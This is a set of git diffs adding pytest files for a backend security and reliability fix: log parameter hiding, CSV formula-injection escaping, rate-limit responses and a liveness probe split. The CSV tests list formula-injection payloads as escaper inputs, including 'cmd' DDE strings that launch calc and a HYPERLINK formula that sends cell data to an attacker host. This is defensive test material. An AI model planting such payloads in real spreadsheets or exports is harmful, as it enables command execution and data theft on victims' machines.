+        assert _cog_presign_seconds(_request_with(junk)) == (
+            _COG_PRESIGN_CEILING_SECONDS
+        )
+
+
+def test_the_redirect_no_longer_signs_a_flat_hour():
+    src = inspect.getsource(_s3_cog_response)
+    assert "expiration=3600" not in src
+    assert "_cog_presign_seconds(request)" in src
+
+
+def test_the_dependency_records_the_token_deadline():
+    """Without this the redirect has nothing to derive its window from."""
+    src = inspect.getsource(_resolve_download_user)
+    assert "request.state.download_token_exp" in src

--- a/backend/tests/test_engine_hides_bound_parameters.py
+++ b/backend/tests/test_engine_hides_bound_parameters.py
@@ -1,0 +1,52 @@
+"""fix(#1778): the app engine must not render bound parameters into errors.
+
+SQLAlchemy defaults ``hide_parameters`` to False, so every StatementError
+carries ``[SQL: ...] [parameters: (...)]`` in its message. The DB error
+handler logs that message with a traceback, and the SEC-03 redactor in
+``core/logging_config.py`` only rewrites top-level event_dict keys by name --
+it is documented as shallow and cannot reach values embedded in the
+``exception`` string. A connection reset or statement timeout mid-INSERT on
+``catalog.users`` therefore wrote password_hash, email and username to stdout.
+"""
+
+from __future__ import annotations
+
+from sqlalchemy.exc import StatementError
+
+
+def test_app_engine_is_built_with_hide_parameters():
+    from app.core.db import session as session_module
+
+    assert session_module._engine_kwargs.get("hide_parameters") is True
+    # The engine actually carries it: SQLAlchemy reads engine.hide_parameters
+    # when it wraps a DBAPI error, not the kwargs dict.
+    assert session_module.engine.sync_engine.hide_parameters is True
+
+
+def test_hide_parameters_keeps_bound_values_out_of_the_message():
+    """The behaviour the flag buys, pinned against a SQLAlchemy change."""
+    secret = "bcrypt-hash-that-must-not-be-logged"
+    hidden = StatementError(
+        message="connection was closed",
+        statement="INSERT INTO catalog.users (email, password_hash) VALUES ($1, $2)",
+        params=("operator@example.com", secret),
+        orig=Exception("connection was closed"),
+        hide_parameters=True,
+    )
+    rendered = str(hidden)
+    assert secret not in rendered
+    assert "operator@example.com" not in rendered
+    # The statement text still reaches the log, which is what the DB error
+    # handler's docstring asks for.
+    assert "INSERT INTO catalog.users" in rendered
+
+    exposed = StatementError(
+        message="connection was closed",
+        statement="INSERT INTO catalog.users (email, password_hash) VALUES ($1, $2)",
+        params=("operator@example.com", secret),
+        orig=Exception("connection was closed"),
+        hide_parameters=False,
+    )
+    # Positive control: without the flag the value is right there in the string
+    # the handler logs.
+    assert secret in str(exposed)

--- a/backend/tests/test_export_csv_formula_hardening_1778.py
+++ b/backend/tests/test_export_csv_formula_hardening_1778.py
@@ -1,0 +1,130 @@
+"""fix(#1778): the dataset CSV export needs the hardening its siblings have.
+
+ogr2ogr writes every attribute value verbatim and the writer side validates
+only the column NAME, so an editor on a public dataset can store a property
+beginning with =, +, - or @ and any anonymous visitor who downloads the CSV
+distribution the DCAT record advertises executes it on open. Cross-privilege
+sink: the writer needs edit rights on one dataset, the victim needs none.
+
+Two sibling CSV writers (the audit-log export and the admin user export) have
+carried the escape for a long time. All three now share one rule.
+"""
+
+from __future__ import annotations
+
+import csv
+import inspect
+from pathlib import Path
+
+import pytest
+
+from app.core.csv_safety import escape_csv_formula
+from app.processing.export.ogr import _harden_csv_formulas, run_ogr2ogr_export
+
+
+@pytest.mark.parametrize(
+    "value",
+    [
+        "=SUM(1,1)",
+        "+1-cmd|'/c calc'!A0",
+        "-2+3+cmd|' /C calc'!A0",
+        '@HYPERLINK("http://attacker/","click")',
+        '=HYPERLINK(CONCAT("http://attacker/?",A1),"x")',
+        "-",
+        "+",
+        "-1.2.3",
+        "-12abc",
+        "+1e",
+    ],
+)
+def test_formula_shaped_cells_are_escaped(value: str) -> None:
+    assert escape_csv_formula(value) == "\t" + value
+
+
+@pytest.mark.parametrize(
+    "value",
+    ["-12", "+12", "-0.5", "+.5", "-1.5e-3", "+2E10", "-0"],
+)
+def test_plain_numbers_are_left_alone(value: str) -> None:
+    """A number is not a formula, and a data export is full of negatives.
+
+    Tab-prefixing them would turn every negative measurement in an attribute
+    table into text, for the spreadsheet and for pandas and QGIS alike.
+    """
+    assert escape_csv_formula(value) == value
+
+
+@pytest.mark.parametrize(
+    "value", ["", "name", "POINT(-1 2)", "2026-09-02", "a=b", "12-14"]
+)
+def test_ordinary_cells_are_untouched(value: str) -> None:
+    assert escape_csv_formula(value) == value
+
+
+def test_hardening_rewrites_a_csv_in_place(tmp_path: Path) -> None:
+    target = tmp_path / "export.csv"
+    target.write_text(
+        "WKT,name,elevation,note\n"
+        '"POINT (-1 2)",=SUM(1;1),-12,"quoted, comma"\n'
+        '"POINT (3 4)",ordinary,+0.5,"@evil"\n',
+        encoding="utf-8",
+    )
+
+    _harden_csv_formulas(str(target))
+
+    with open(target, newline="", encoding="utf-8") as fh:
+        rows = list(csv.reader(fh))
+
+    assert rows[0] == ["WKT", "name", "elevation", "note"]
+    assert rows[1] == ["POINT (-1 2)", "\t=SUM(1;1)", "-12", "quoted, comma"]
+    assert rows[2] == ["POINT (3 4)", "ordinary", "+0.5", "\t@evil"]
+    # No leftover intermediate file.
+    assert not (tmp_path / "export.csv.hardened").exists()
+
+
+def test_hardening_preserves_the_line_ending_gdal_chose(tmp_path: Path) -> None:
+    crlf = tmp_path / "crlf.csv"
+    crlf.write_bytes(b"a,b\r\n=1,2\r\n")
+    _harden_csv_formulas(str(crlf))
+    assert b"\r\n" in crlf.read_bytes()
+
+    lf = tmp_path / "lf.csv"
+    lf.write_bytes(b"a,b\n=1,2\n")
+    _harden_csv_formulas(str(lf))
+    assert b"\r\n" not in lf.read_bytes()
+
+
+def test_hardening_survives_a_wkt_cell_past_the_csv_default_limit(
+    tmp_path: Path,
+) -> None:
+    """A detailed polygon's WKT passes csv's 128 KiB default field limit."""
+    huge = "POINT (" + "0" * 200_000 + " 1)"
+    target = tmp_path / "huge.csv"
+    with open(target, "w", newline="", encoding="utf-8") as fh:
+        writer = csv.writer(fh)
+        writer.writerow(["WKT", "note"])
+        writer.writerow([huge, "=SUM(1,1)"])
+
+    _harden_csv_formulas(str(target))
+
+    with open(target, newline="", encoding="utf-8") as fh:
+        rows = list(csv.reader(fh))
+    assert rows[1][0] == huge
+    assert rows[1][1] == "\t=SUM(1,1)"
+
+
+def test_the_export_runs_the_pass_only_for_csv_and_only_on_success() -> None:
+    src = inspect.getsource(run_ogr2ogr_export)
+    assert "_harden_csv_formulas(output_path)" in src
+    hardening_at = src.index("_harden_csv_formulas(output_path)")
+    failure_raise_at = src.index("ogr2ogr export failed")
+    assert failure_raise_at < hardening_at, "a failed run must not be post-processed"
+
+
+def test_all_three_csv_writers_share_one_rule() -> None:
+    """The defect was three writers, two private copies and one omission."""
+    from app.modules.admin import router as admin_router
+    from app.modules.audit import router as audit_router
+
+    assert audit_router._safe_csv_cell is escape_csv_formula
+    assert admin_router.escape_csv_formula is escape_csv_formula

--- a/backend/tests/test_export_csv_formula_hardening_1778.py
+++ b/backend/tests/test_export_csv_formula_hardening_1778.py
@@ -20,7 +20,7 @@ from pathlib import Path
 
 import pytest
 
-from app.core.csv_safety import escape_csv_formula
+from app.core.csv_safety import escape_csv_formula, numeric_column_names
 from app.processing.export.ogr import (
     ExportError,
     _harden_csv_formulas,
@@ -56,13 +56,52 @@ def test_formula_shaped_cells_are_escaped(value: str) -> None:
     "value",
     ["-12", "+12", "-0.5", "+.5", "-1.5e-3", "+2E10", "-0"],
 )
-def test_plain_numbers_are_left_alone(value: str) -> None:
+def test_the_default_escapes_numbers_too(value: str) -> None:
+    """fix(#1778 codex r2): strict is the default, and the audit and admin
+    exports keep it. A username of `+123` or an account id of `-001` is a
+    string that happens to look like a number, and a security log should not
+    trade its protection for right-alignment."""
+    assert escape_csv_formula(value) == "\t" + value
+
+
+@pytest.mark.parametrize(
+    "value",
+    ["-12", "+12", "-0.5", "+.5", "-1.5e-3", "+2E10", "-0"],
+)
+def test_a_numeric_column_keeps_its_numbers_bare(value: str) -> None:
     """A number is not a formula, and a data export is full of negatives.
 
     Tab-prefixing them would turn every negative measurement in an attribute
     table into text, for the spreadsheet and for pandas and QGIS alike.
     """
-    assert escape_csv_formula(value) == value
+    assert escape_csv_formula(value, allow_numeric=True) == value
+
+
+@pytest.mark.parametrize("value", ["-12+A1", "-", "+", "-1.2.3", "=1", "@x"])
+def test_a_numeric_column_still_escapes_what_is_not_a_number(value: str) -> None:
+    assert escape_csv_formula(value, allow_numeric=True) == "\t" + value
+
+
+def test_numeric_column_names_reads_the_declared_type_not_the_values():
+    """The exemption is placed by column type. `get_column_info` stores
+    information_schema's data_type verbatim."""
+    column_info = [
+        {"name": "elevation", "type": "double precision"},
+        {"name": "population", "type": "integer"},
+        {"name": "count_big", "type": "bigint"},
+        {"name": "ratio", "type": "numeric"},
+        {"name": "name", "type": "text"},
+        {"name": "code", "type": "character varying"},
+        {"name": "seen_at", "type": "timestamp without time zone"},
+        {"name": "shape", "type": "USER-DEFINED"},
+        {"name": None, "type": "integer"},
+        "not-a-mapping",
+    ]
+    assert numeric_column_names(column_info) == frozenset(
+        {"elevation", "population", "count_big", "ratio"}
+    )
+    assert numeric_column_names(None) == frozenset()
+    assert numeric_column_names([]) == frozenset()
 
 
 @pytest.mark.parametrize(
@@ -81,7 +120,7 @@ def test_hardening_rewrites_a_csv_in_place(tmp_path: Path) -> None:
         encoding="utf-8",
     )
 
-    _harden_csv_formulas(str(target), _far_deadline())
+    _harden_csv_formulas(str(target), _far_deadline(), frozenset({"elevation"}))
 
     with open(target, newline="", encoding="utf-8") as fh:
         rows = list(csv.reader(fh))
@@ -91,6 +130,36 @@ def test_hardening_rewrites_a_csv_in_place(tmp_path: Path) -> None:
     assert rows[2] == ["POINT (3 4)", "ordinary", "+0.5", "\t@evil"]
     # No leftover intermediate file.
     assert not (tmp_path / "export.csv.hardened").exists()
+
+
+def test_the_exemption_follows_the_column_not_the_value(tmp_path: Path) -> None:
+    """fix(#1778 codex r2): the same characters, two columns, two answers."""
+    target = tmp_path / "typed.csv"
+    target.write_text(
+        "elevation,label\n-1,-1\n+2.5,+2.5\n-12+A1,-12+A1\n",
+        encoding="utf-8",
+    )
+
+    _harden_csv_formulas(str(target), _far_deadline(), frozenset({"elevation"}))
+
+    with open(target, newline="", encoding="utf-8") as fh:
+        rows = list(csv.reader(fh))
+
+    assert rows[1] == ["-1", "\t-1"], "a numeric column keeps -1 bare"
+    assert rows[2] == ["+2.5", "\t+2.5"]
+    assert rows[3] == ["\t-12+A1", "\t-12+A1"], "not a number, so not exempt"
+
+
+def test_no_declared_numeric_columns_escapes_everything(tmp_path: Path) -> None:
+    """An export whose dataset has no column_info fails toward escaping."""
+    target = tmp_path / "untyped.csv"
+    target.write_text("elevation,label\n-1,-1\n", encoding="utf-8")
+
+    _harden_csv_formulas(str(target), _far_deadline(), frozenset())
+
+    with open(target, newline="", encoding="utf-8") as fh:
+        rows = list(csv.reader(fh))
+    assert rows[1] == ["\t-1", "\t-1"]
 
 
 def test_hardening_preserves_the_line_ending_gdal_chose(tmp_path: Path) -> None:
@@ -116,7 +185,7 @@ def test_hardening_survives_a_wkt_cell_past_the_csv_default_limit(
         writer.writerow(["WKT", "note"])
         writer.writerow([huge, "=SUM(1,1)"])
 
-    _harden_csv_formulas(str(target), _far_deadline())
+    _harden_csv_formulas(str(target), _far_deadline(), frozenset())
 
     with open(target, newline="", encoding="utf-8") as fh:
         rows = list(csv.reader(fh))
@@ -154,6 +223,25 @@ def test_all_three_csv_writers_share_one_rule() -> None:
     assert admin_router.escape_csv_formula is escape_csv_formula
 
 
+def test_the_admin_and_audit_exports_stay_strict() -> None:
+    """fix(#1778 codex r2): neither may pass allow_numeric.
+
+    They call the shared helper positionally, so the default governs; this
+    fails if someone opts either of them into the dataset export's exemption.
+    """
+    from app.modules.admin import router as admin_router
+    from app.modules.audit import router as audit_router
+
+    for module in (admin_router, audit_router):
+        assert "allow_numeric" not in inspect.getsource(module), (
+            f"{module.__name__} must keep escaping every leading sign"
+        )
+
+    # The property, not just the absence: a username shaped like a number.
+    assert escape_csv_formula("+123") == "\t+123"
+    assert escape_csv_formula("-001") == "\t-001"
+
+
 @pytest.mark.anyio
 async def test_a_large_pass_does_not_block_a_concurrent_request(tmp_path: Path) -> None:
     """fix(#1778 codex r1): the loop stays responsive while the pass runs.
@@ -182,7 +270,9 @@ async def test_a_large_pass_does_not_block_a_concurrent_request(tmp_path: Path) 
 
     ticker = asyncio.create_task(keep_turning())
     try:
-        await run_in_thread_draining(_harden_csv_formulas, str(target), _far_deadline())
+        await run_in_thread_draining(
+            _harden_csv_formulas, str(target), _far_deadline(), frozenset({"value"})
+        )
     finally:
         ticker.cancel()
         await asyncio.gather(ticker, return_exceptions=True)
@@ -203,7 +293,7 @@ def test_an_expired_deadline_fails_the_export_instead_of_finishing_late(
     target.write_text(original, encoding="utf-8")
 
     with pytest.raises(ExportError, match="request budget"):
-        _harden_csv_formulas(str(target), time.monotonic() - 1)
+        _harden_csv_formulas(str(target), time.monotonic() - 1, frozenset())
 
     # The artifact is untouched and no half-rewritten sibling is left behind.
     assert target.read_text(encoding="utf-8") == original

--- a/backend/tests/test_export_csv_formula_hardening_1778.py
+++ b/backend/tests/test_export_csv_formula_hardening_1778.py
@@ -12,14 +12,25 @@ carried the escape for a long time. All three now share one rule.
 
 from __future__ import annotations
 
+import asyncio
 import csv
 import inspect
+import time
 from pathlib import Path
 
 import pytest
 
 from app.core.csv_safety import escape_csv_formula
-from app.processing.export.ogr import _harden_csv_formulas, run_ogr2ogr_export
+from app.processing.export.ogr import (
+    ExportError,
+    _harden_csv_formulas,
+    run_ogr2ogr_export,
+)
+
+
+def _far_deadline() -> float:
+    """A budget no test pass can exhaust."""
+    return time.monotonic() + 3600
 
 
 @pytest.mark.parametrize(
@@ -70,7 +81,7 @@ def test_hardening_rewrites_a_csv_in_place(tmp_path: Path) -> None:
         encoding="utf-8",
     )
 
-    _harden_csv_formulas(str(target))
+    _harden_csv_formulas(str(target), _far_deadline())
 
     with open(target, newline="", encoding="utf-8") as fh:
         rows = list(csv.reader(fh))
@@ -85,12 +96,12 @@ def test_hardening_rewrites_a_csv_in_place(tmp_path: Path) -> None:
 def test_hardening_preserves_the_line_ending_gdal_chose(tmp_path: Path) -> None:
     crlf = tmp_path / "crlf.csv"
     crlf.write_bytes(b"a,b\r\n=1,2\r\n")
-    _harden_csv_formulas(str(crlf))
+    _harden_csv_formulas(str(crlf), _far_deadline())
     assert b"\r\n" in crlf.read_bytes()
 
     lf = tmp_path / "lf.csv"
     lf.write_bytes(b"a,b\n=1,2\n")
-    _harden_csv_formulas(str(lf))
+    _harden_csv_formulas(str(lf), _far_deadline())
     assert b"\r\n" not in lf.read_bytes()
 
 
@@ -105,7 +116,7 @@ def test_hardening_survives_a_wkt_cell_past_the_csv_default_limit(
         writer.writerow(["WKT", "note"])
         writer.writerow([huge, "=SUM(1,1)"])
 
-    _harden_csv_formulas(str(target))
+    _harden_csv_formulas(str(target), _far_deadline())
 
     with open(target, newline="", encoding="utf-8") as fh:
         rows = list(csv.reader(fh))
@@ -115,10 +126,23 @@ def test_hardening_survives_a_wkt_cell_past_the_csv_default_limit(
 
 def test_the_export_runs_the_pass_only_for_csv_and_only_on_success() -> None:
     src = inspect.getsource(run_ogr2ogr_export)
-    assert "_harden_csv_formulas(output_path)" in src
-    hardening_at = src.index("_harden_csv_formulas(output_path)")
+    assert "_harden_csv_formulas," in src
+    hardening_at = src.index("_harden_csv_formulas,")
     failure_raise_at = src.index("ogr2ogr export failed")
     assert failure_raise_at < hardening_at, "a failed run must not be post-processed"
+
+
+def test_the_export_runs_the_pass_off_the_event_loop_and_under_the_deadline() -> None:
+    """fix(#1778 codex r1): inline, this stalled every concurrent request."""
+    src = inspect.getsource(run_ogr2ogr_export)
+    assert "run_in_thread_draining(" in src, (
+        "the pass must go through the draining thread helper its sibling "
+        "post-processing steps use"
+    )
+    assert (
+        "export_subprocess_timeout_seconds(deadline)"
+        in src.split("_harden_csv_formulas,")[1]
+    ), "the pass must be given the request's remaining budget"
 
 
 def test_all_three_csv_writers_share_one_rule() -> None:
@@ -128,3 +152,59 @@ def test_all_three_csv_writers_share_one_rule() -> None:
 
     assert audit_router._safe_csv_cell is escape_csv_formula
     assert admin_router.escape_csv_formula is escape_csv_formula
+
+
+@pytest.mark.anyio
+async def test_a_large_pass_does_not_block_a_concurrent_request(tmp_path: Path) -> None:
+    """fix(#1778 codex r1): the loop stays responsive while the pass runs.
+
+    The pass is driven the way `run_ogr2ogr_export` drives it. A cooperating
+    task that only needs the loop to turn must complete while the rewrite is
+    still going; run inline on the loop it could not, because a blocking
+    read-and-rewrite yields to nothing until it is done.
+    """
+    from app.core.async_io import run_in_thread_draining
+
+    target = tmp_path / "big.csv"
+    with open(target, "w", newline="", encoding="utf-8") as fh:
+        writer = csv.writer(fh)
+        writer.writerow(["name", "value", "note"])
+        for i in range(200_000):
+            writer.writerow([f"row-{i}", f"-{i}", "=SUM(1,1)"])
+
+    loop_turns = 0
+
+    async def keep_turning() -> None:
+        nonlocal loop_turns
+        while True:
+            await asyncio.sleep(0)
+            loop_turns += 1
+
+    ticker = asyncio.create_task(keep_turning())
+    try:
+        await run_in_thread_draining(_harden_csv_formulas, str(target), _far_deadline())
+    finally:
+        ticker.cancel()
+        await asyncio.gather(ticker, return_exceptions=True)
+
+    assert loop_turns > 0, "the event loop never turned while the pass ran"
+
+    with open(target, newline="", encoding="utf-8") as fh:
+        rows = list(csv.reader(fh))
+    assert rows[1] == ["row-0", "-0", "\t=SUM(1,1)"]
+
+
+def test_an_expired_deadline_fails_the_export_instead_of_finishing_late(
+    tmp_path: Path,
+) -> None:
+    """fix(#1778 codex r1): the budget the subprocess had now covers the pass."""
+    target = tmp_path / "late.csv"
+    original = "a,b\n=1,2\n=3,4\n"
+    target.write_text(original, encoding="utf-8")
+
+    with pytest.raises(ExportError, match="request budget"):
+        _harden_csv_formulas(str(target), time.monotonic() - 1)
+
+    # The artifact is untouched and no half-rewritten sibling is left behind.
+    assert target.read_text(encoding="utf-8") == original
+    assert not (tmp_path / "late.csv.hardened").exists()

--- a/backend/tests/test_global_rate_limit_envelope_1778.py
+++ b/backend/tests/test_global_rate_limit_envelope_1778.py
@@ -1,0 +1,87 @@
+"""fix(#1778): the GLOBAL default rate limit must answer with the app envelope.
+
+slowapi enforces the default limit inside `SlowAPIMiddleware.dispatch`, a
+synchronous BaseHTTPMiddleware. Its `sync_check_limits` refuses to run a
+coroutine exception handler there and silently substitutes slowapi's own,
+which returns a bare `{"error": ...}` in application/json with no Retry-After
+(the Limiter is not built with `headers_enabled`). Routes carrying an explicit
+`@limiter.limit` decorator are exempted from the middleware and take the
+exception-handler path instead, so every existing test of the 429 contract
+drives a decorated route and passes. This one drives an undecorated one.
+"""
+
+from __future__ import annotations
+
+import pytest
+from fastapi import FastAPI
+from httpx import ASGITransport, AsyncClient
+from slowapi import Limiter
+from slowapi.errors import RateLimitExceeded
+from slowapi.middleware import SlowAPIMiddleware
+from slowapi.util import get_remote_address
+
+
+def _app_with(handler) -> FastAPI:
+    """A one-route app whose only limit is the global default."""
+    limiter = Limiter(
+        key_func=get_remote_address,
+        default_limits=["1/minute"],
+        key_style="endpoint",
+    )
+    app = FastAPI()
+    app.state.limiter = limiter
+    app.add_exception_handler(RateLimitExceeded, handler)
+    app.add_middleware(SlowAPIMiddleware)
+
+    @app.get("/undecorated")
+    async def undecorated() -> dict[str, bool]:  # pragma: no cover - trivial
+        return {"ok": True}
+
+    return app
+
+
+async def _second_call(app: FastAPI):
+    transport = ASGITransport(app=app)
+    async with AsyncClient(transport=transport, base_url="http://test") as http:
+        first = await http.get("/undecorated")
+        assert first.status_code == 200, "first call should be under the limit"
+        return await http.get("/undecorated")
+
+
+@pytest.mark.anyio
+async def test_global_limit_429_carries_retry_after_and_problem_detail():
+    from app.api.main import _rate_limit_handler
+
+    resp = await _second_call(_app_with(_rate_limit_handler))
+
+    assert resp.status_code == 429
+    assert "retry-after" in resp.headers, (
+        f"global-limit 429 lost Retry-After; headers: {dict(resp.headers)}"
+    )
+    assert int(resp.headers["retry-after"]) > 0
+    assert resp.headers["content-type"].startswith("application/problem+json")
+    body = resp.json()
+    for field in ("type", "title", "status", "detail"):
+        assert field in body, f"ProblemDetail field {field!r} missing from {body}"
+    assert body["status"] == 429
+
+
+@pytest.mark.anyio
+async def test_a_coroutine_handler_is_discarded_by_the_middleware():
+    """The positive control: this is what the app used to send.
+
+    Keeps the failure mode legible if slowapi ever changes -- if the
+    substitution stops happening, this test fails and the fix above becomes
+    unnecessary rather than wrong.
+    """
+    from app.api.main import _rate_limit_handler
+
+    async def _async_handler(request, exc):
+        return _rate_limit_handler(request, exc)
+
+    resp = await _second_call(_app_with(_async_handler))
+
+    assert resp.status_code == 429
+    assert "retry-after" not in resp.headers
+    assert resp.headers["content-type"].startswith("application/json")
+    assert set(resp.json()) == {"error"}

--- a/backend/tests/test_health_liveness_split_1778.py
+++ b/backend/tests/test_health_liveness_split_1778.py
@@ -1,0 +1,76 @@
+"""fix(#1778): the API needs a liveness probe distinct from readiness.
+
+`/health` gathers a database, an object-store and a cache probe and 503s when
+any of them is degraded. The cache provider is explicitly engineered to survive
+a Valkey outage (in-memory fallback behind a circuit breaker), so an outage the
+API serves straight through still marked the container unhealthy -- and that
+probe is what gates `frontend: depends_on: api: service_healthy`, so a restart
+during the outage left the UI down because the cache was down. Under an
+orchestrator with an HTTP liveness probe on `/health` the pod is killed and
+restarted in a loop while the API can serve catalog reads.
+
+The worker has had this split since it was written
+(`observability/health/worker.py`: `/health/live` and `/health/ready`).
+"""
+
+from __future__ import annotations
+
+import re
+from pathlib import Path
+
+import pytest
+from httpx import ASGITransport, AsyncClient
+
+_REPO_ROOT = Path(__file__).resolve().parents[2]
+
+
+@pytest.mark.anyio
+async def test_health_live_answers_without_probing_any_dependency():
+    from app.api.main import app
+
+    transport = ASGITransport(app=app)
+    async with AsyncClient(transport=transport, base_url="http://test") as http:
+        resp = await http.get("/health/live")
+
+    assert resp.status_code == 200
+    assert resp.json() == {"status": "ok"}
+
+
+def test_health_live_is_registered_and_readiness_is_unchanged():
+    from app.api.main import app
+
+    paths = {route.path for route in app.routes if hasattr(route, "path")}
+    assert "/health/live" in paths
+    assert "/health" in paths, "readiness must keep its existing path"
+
+
+def test_health_live_stays_out_of_the_published_contract():
+    """Infrastructure surface, like the worker's own probes.
+
+    Keeping it unpublished is what lets this land without an SDK regeneration;
+    if that changes, the snapshot and both SDKs have to move with it.
+    """
+    from app.api.main import app
+
+    for route in app.routes:
+        if getattr(route, "path", None) == "/health/live":
+            assert route.include_in_schema is False
+            break
+    else:  # pragma: no cover - the route assertion above already covers this
+        pytest.fail("/health/live route not found")
+
+
+def test_container_liveness_probes_target_the_liveness_route():
+    """The Dockerfile and compose probes are the reason the split matters."""
+    dockerfile = (_REPO_ROOT / "Dockerfile").read_text()
+    api_probe = re.search(
+        r"urlopen\('http://localhost:8000/health(?P<suffix>[^']*)'\)", dockerfile
+    )
+    assert api_probe is not None, "api stage lost its HEALTHCHECK"
+    assert api_probe.group("suffix") == "/live", (
+        "the api image healthcheck must probe liveness, not readiness"
+    )
+
+    compose = (_REPO_ROOT / "docker-compose.yml").read_text()
+    assert "urlopen('http://localhost:8000/health/live')" in compose
+    assert "urlopen('http://localhost:8000/health')" not in compose

--- a/backend/tests/test_health_liveness_split_1778.py
+++ b/backend/tests/test_health_liveness_split_1778.py
@@ -74,3 +74,32 @@ def test_container_liveness_probes_target_the_liveness_route():
     compose = (_REPO_ROOT / "docker-compose.yml").read_text()
     assert "urlopen('http://localhost:8000/health/live')" in compose
     assert "urlopen('http://localhost:8000/health')" not in compose
+
+
+def test_the_runbook_sends_liveness_to_the_liveness_route():
+    """fix(#1778 codex r6): the docs were still the old contract.
+
+    RUNBOOK.md told operators "Uptime/liveness checks must target
+    `/api/health`" -- the endpoint this PR reclassified as readiness, which
+    fails on a degraded cache and answers 429 under a one-second probe. A
+    split the runbook contradicts is not a split.
+    """
+    runbook = (_REPO_ROOT / "RUNBOOK.md").read_text()
+
+    assert "/api/health/live" in runbook, "RUNBOOK.md never names the liveness endpoint"
+
+    # A line that mentions liveness and points at the readiness endpoint is an
+    # offender only if it never names the liveness one: prose contrasting the
+    # two ("liveness is X, readiness is Y") is exactly what this section is for.
+    # `/api/health/live` contains `/api/health`, so strip the longer form
+    # before looking for the shorter one.
+    offenders = [
+        line.strip()
+        for line in runbook.splitlines()
+        if "liveness" in line.lower()
+        and "/api/health" in line.replace("/api/health/live", "")
+        and "/api/health/live" not in line
+    ]
+    assert not offenders, (
+        f"RUNBOOK.md points a liveness check at the readiness endpoint: {offenders}"
+    )

--- a/backend/tests/test_health_liveness_split_1778.py
+++ b/backend/tests/test_health_liveness_split_1778.py
@@ -103,3 +103,186 @@ def test_the_runbook_sends_liveness_to_the_liveness_route():
     assert not offenders, (
         f"RUNBOOK.md points a liveness check at the readiness endpoint: {offenders}"
     )
+
+
+# ---------------------------------------------------------------------------
+# fix(#1778 codex r7): the probe must not touch a dependency on the way in
+# ---------------------------------------------------------------------------
+#
+# The handler answering without a dependency is only the last step. Three
+# middlewares on the request path have a DB-backed branch, and in multi_tenant
+# mode TenantContextMiddleware turned a database outage into a 403 on the
+# probe -- an orchestrator then restarts an API that is alive and serving
+# catalog reads, which is the restart loop this whole split exists to prevent.
+
+#: Every middleware that reaches the database, the cache or object storage on
+#: the request path, and therefore has to let the probe past. Kept as data so
+#: the structural test below names what it checked rather than grepping the
+#: package and asserting nothing when a rename lands.
+_DB_BACKED_MIDDLEWARE = {
+    "app/api/middleware/tenant_context.py": "public tenant-host registry lookup",
+    "app/api/middleware/cors.py": "CORS_ALLOWED_ORIGINS persistent-config read",
+    "app/api/middleware/body_limit.py": "UPLOAD_MAX_SIZE_MB persistent-config read",
+}
+
+
+def test_every_db_backed_middleware_lets_the_probe_past():
+    """Structural: each one calls the shared predicate, and none rolls its own.
+
+    A path check copied into three middlewares is three things that drift; the
+    predicate lives in api/middleware/liveness.py so a fourth middleware with a
+    DB branch has one obvious thing to call.
+    """
+    for rel, why in _DB_BACKED_MIDDLEWARE.items():
+        src = (_REPO_ROOT / "backend" / rel).read_text()
+        # The call, not the import: `is_liveness_request` on its own is
+        # satisfied by the import line alone, so removing the only call site
+        # would leave this passing. The paren is what makes it a use.
+        assert "is_liveness_request(" in src, (
+            f"{rel} performs a {why} without exempting the liveness probe"
+        )
+        # It must be the shared one, not a local re-spelling of the path.
+        assert "from app.api.middleware.liveness import is_liveness_request" in src, (
+            f"{rel} must use the shared predicate"
+        )
+        assert '"/health/live"' not in src, (
+            f"{rel} hardcodes the liveness path instead of calling the predicate"
+        )
+
+
+def test_the_db_backed_middleware_list_is_the_whole_set():
+    """The list above must not go stale as middlewares gain DB branches.
+
+    Anything under api/middleware/ that reaches app.core.db is either on the
+    list or this fails naming it.
+    """
+    middleware_dir = _REPO_ROOT / "backend" / "app" / "api" / "middleware"
+    touches_db = {
+        f"app/api/middleware/{path.name}"
+        for path in sorted(middleware_dir.glob("*.py"))
+        if "from app.core.db import" in path.read_text()
+    }
+    assert touches_db, "no middleware reads app.core.db -- the scan found nothing"
+    unlisted = touches_db - set(_DB_BACKED_MIDDLEWARE)
+    assert not unlisted, (
+        "middleware reaching the database without an entry in "
+        f"_DB_BACKED_MIDDLEWARE: {sorted(unlisted)}"
+    )
+
+
+def test_the_liveness_route_takes_no_dependencies():
+    """The handler itself: no Depends(get_db), nothing to resolve."""
+    from app.api.main import app
+
+    for route in app.routes:
+        if getattr(route, "path", None) == "/health/live":
+            assert route.dependant.dependencies == [], (
+                "the liveness handler acquired a dependency; get_db would put a "
+                "pool checkout on the one route that must not need one"
+            )
+            break
+    else:  # pragma: no cover - the registration test already covers this
+        pytest.fail("/health/live route not found")
+
+
+def test_the_liveness_route_is_exempt_from_the_rate_limiter():
+    """slowapi's middleware short-circuits an exempt route before any counter.
+
+    A one-second probe would otherwise exhaust a 60/minute budget on its own,
+    and a 429 reads as a dead process. Exemption also keeps the probe off the
+    limiter's storage, which is Redis when REDIS_URL is set.
+    """
+    from slowapi.middleware import _get_route_name
+
+    from app.api.main import health_live
+    from app.platform.ratelimit import limiter
+
+    assert _get_route_name(health_live) in limiter._exempt_routes
+
+
+@pytest.mark.anyio
+async def test_liveness_answers_200_in_multi_tenant_with_the_database_down(
+    monkeypatch,
+):
+    """The reproduction: multi_tenant, tenant hostname, database unreachable.
+
+    Before this, TenantContextMiddleware resolved the host through the public
+    registry, got nothing back because the database was down, and answered 403.
+    """
+    import app.api.middleware.tenant_context as tenant_context
+
+    calls: list[str | None] = []
+
+    async def _registry_is_down(signal):
+        calls.append(signal)
+        raise OSError("connection refused")
+
+    monkeypatch.setattr(tenant_context, "is_multi_tenant", lambda: True)
+    monkeypatch.setattr(tenant_context.settings, "tenant_base_domain", "geolens.app")
+    monkeypatch.setattr(tenant_context.settings, "tenant_trusted_hosts", "testserver")
+    monkeypatch.setattr(tenant_context, "_resolve_tenant_uuid", _registry_is_down)
+
+    from app.api.main import app
+
+    transport = ASGITransport(app=app)
+    async with AsyncClient(transport=transport, base_url="http://test") as http:
+        resp = await http.get("/health/live", headers={"host": "acme.geolens.app"})
+
+    assert resp.status_code == 200, resp.text
+    assert resp.json() == {"status": "ok"}
+    assert calls == [], (
+        "the probe reached the tenant registry; with the database down that is "
+        "a 403 and a restarted container"
+    )
+
+
+@pytest.mark.anyio
+async def test_readiness_still_resolves_the_tenant_in_multi_tenant(monkeypatch):
+    """The counterweight: the exemption is scoped to the liveness path only.
+
+    /health is the readiness view and stays behind tenant resolution, so a
+    blanket path skip would show up here.
+    """
+    import app.api.middleware.tenant_context as tenant_context
+
+    calls: list[str | None] = []
+
+    async def _resolve(signal):
